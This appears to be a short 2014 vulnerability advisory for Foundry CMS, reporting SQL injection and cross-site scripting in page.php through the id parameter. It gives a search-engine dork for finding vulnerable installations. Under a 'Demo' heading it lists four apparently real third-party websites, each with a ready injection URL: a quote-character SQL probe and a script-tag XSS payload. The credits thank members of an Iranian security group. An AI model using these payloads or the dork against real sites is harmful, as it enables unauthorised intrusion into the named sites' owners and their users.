Foundry CMS Multiple Vulnerability

Description:
[+] Title: Foundry CMS Multiple Vulnerability
[+] Date: 2014/07/20
[+] Author: Hekt0r
[+] Vendor Homepage: www.design-foundry.co.uk
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable Files: /page.php
[+} Dork : intext:"Site by The Design Foundry"

### POC:
[+] Sql Injection: http://site/page.php?id=[SQL-Injection]
[+] XSS:  http://site/page.php?id=[XSS]          
### Demo:
[+] Sql injection: http://www.resonatehub.co.uk/page.php?id=1'
                   http://www.sutcliffe.co.uk/page.php?id=1'
                                   http://www.warmerenergyservices.com/page.php?id=25'
                                   http://www.my-maintenance.com/page.php?id=1'
[+] Xss: http://www.resonatehub.co.uk/page.php?id=<script>alert(/xss/)</script>
         http://www.sutcliffe.co.uk/page.php?id=<script>alert(/xss/)</script>
                 http://www.warmerenergyservices.com/page.php?id=<script>alert(/xss/)</script>
                 http://www.my-maintenance.com/page.php?id=<script>alert(/xss/)</script>
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire,Ali Ahmady Saeed.Jok3r, M4hdi,
                    ALIREZA_PROMIS And All members of Iran Security Group
[+] iransec.net



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information